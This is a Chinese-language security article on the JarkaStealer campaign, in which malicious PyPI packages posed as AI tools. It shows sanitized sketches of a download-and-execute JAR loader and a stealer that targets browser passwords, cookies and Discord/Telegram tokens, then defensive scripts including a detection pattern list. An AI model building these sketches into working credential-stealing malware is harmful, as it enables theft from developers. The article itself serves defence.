最近几个月,通过伪装成 AI 开发工具的 PyPI 包针对 Python 开发人员的复杂供应链攻击激增。让我们分析这些攻击并学习如何保护我们的开发环境。
发现了两个传播 JarkaStealer 恶意软件的著名软件包:
这两个软件包在最终从 PyPI 中删除之前都吸引了数千次下载。
这是典型的恶意包结构:
# setup.py
from setuptools import setup
setup(
name="gptplus",
version="1.0.0",
description="Enhanced GPT-4 Turbo API Integration",
packages=["gptplus"],
install_requires=[
"requests>=2.25.1",
"cryptography>=3.4.7"
]
)
# Inside main package file
import base64
import os
import subprocess
def initialize():
encoded_payload = "BASE64_ENCODED_MALICIOUS_PAYLOAD"
decoded = base64.b64decode(encoded_payload)
# Malicious execution follows
攻击遵循以下顺序:
# Simplified representation of the malware deployment process
def deploy_malware():
# Check if Java is installed
if not is_java_installed():
download_jre()
# Download malicious JAR
jar_url = "https://github.com/[REDACTED]/JavaUpdater.jar"
download_file(jar_url, "JavaUpdater.jar")
# Execute with system privileges
subprocess.run(["java", "-jar", "JavaUpdater.jar"])
JarkaStealer 的数据收集方法:
# Pseudocode representing JarkaStealer's operation
class JarkaStealer:
def collect_browser_data(self):
paths = {
'chrome': os.path.join(os.getenv('LOCALAPPDATA'),
'Google/Chrome/User Data/Default'),
'firefox': os.path.join(os.getenv('APPDATA'),
'Mozilla/Firefox/Profiles')
}
# Extract cookies, history, saved passwords
def collect_system_info(self):
info = {
'hostname': os.getenv('COMPUTERNAME'),
'username': os.getenv('USERNAME'),
'ip': requests.get('https://api.ipify.org').text
}
return info
def steal_tokens(self):
token_paths = {
'discord': os.path.join(os.getenv('APPDATA'), 'discord'),
'telegram': os.path.join(os.getenv('APPDATA'), 'Telegram Desktop')
}
# Extract and exfiltrate tokens
这是一个可用于在安装前验证软件包的工具:
import requests
import json
from datetime import datetime
import subprocess
def analyze_package(package_name):
"""
Comprehensive package analysis tool
"""
def check_pypi_info():
url = f"https://pypi.org/pypi/{package_name}/json"
response = requests.get(url)
if response.status_code == 200:
data = response.json()
return {
"author": data["info"]["author"],
"maintainer": data["info"]["maintainer"],
"home_page": data["info"]["home_page"],
"project_urls": data["info"]["project_urls"],
"release_date": datetime.fromisoformat(
data["releases"][data["info"]["version"]][0]["upload_time_iso_8601"]
)
}
return None
def scan_dependencies():
result = subprocess.run(
["pip-audit", package_name],
capture_output=True,
text=True
)
return result.stdout
info = check_pypi_info()
if info:
print(f"Package Analysis for {package_name}:")
print(f"Author: {info['author']}")
print(f"Maintainer: {info['maintainer']}")
print(f"Homepage: {info['home_page']}")
print(f"Release Date: {info['release_date']}")
# Red flags check
if (datetime.now() - info['release_date']).days < 30:
print("⚠️ Warning: Recently published package")
if not info['home_page']:
print("⚠️ Warning: No homepage provided")
# Scan dependencies
print("\nDependency Scan Results:")
print(scan_dependencies())
else:
print(f"Package {package_name} not found on PyPI")
实施此监控脚本来检测可疑活动:
import psutil
import os
import logging
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
class SuspiciousActivityMonitor(FileSystemEventHandler):
def __init__(self):
self.logger = logging.getLogger('SecurityMonitor')
self.suspicious_patterns = [
'JavaUpdater',
'.jar',
'base64',
'telegram',
'discord'
]
def on_created(self, event):
if not event.is_directory:
self._check_file(event.src_path)
def _check_file(self, filepath):
filename = os.path.basename(filepath)
# Check for suspicious patterns
for pattern in self.suspicious_patterns:
if pattern.lower() in filename.lower():
self.logger.warning(
f"Suspicious file created: {filepath}"
)
# Check for base64 encoded content
try:
with open(filepath, 'r') as f:
content = f.read()
if 'base64' in content:
self.logger.warning(
f"Possible base64 encoded payload in: {filepath}"
)
except:
pass
def start_monitoring():
logging.basicConfig(level=logging.INFO)
event_handler = SuspiciousActivityMonitor()
observer = Observer()
observer.schedule(event_handler, path=os.getcwd(), recursive=True)
observer.start()
return observer
# Create isolated environments for each project python -m venv .venv source .venv/bin/activate # Unix .venv\Scripts\activate # Windows # Lock dependencies pip freeze > requirements.txt
# Example GitHub Actions workflow
name: Security Scan
on: [push, pull_request]
jobs:
security:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: Run security scan
run: |
pip install safety bandit
safety check
bandit -r .
以人工智能为主题的 PyPI 攻击的兴起代表了供应链威胁的复杂演变。通过实施稳健的验证流程并保持警惕的监控系统,开发团队可以显着减少面临这些风险的风险。
请记住:集成 AI 包时,请务必验证来源、扫描代码并保持全面的安全监控。预防成本始终低于从安全漏洞中恢复的成本。
注:本文基于真实安全事件。一些代码示例已被修改以防止误用。
以上是检测和缓解针对 AI 爱好者的 PyPI 攻击:深入研究 JarkaStealer 活动的详细内容。更多信息请关注PHP中文网其他相关文章!
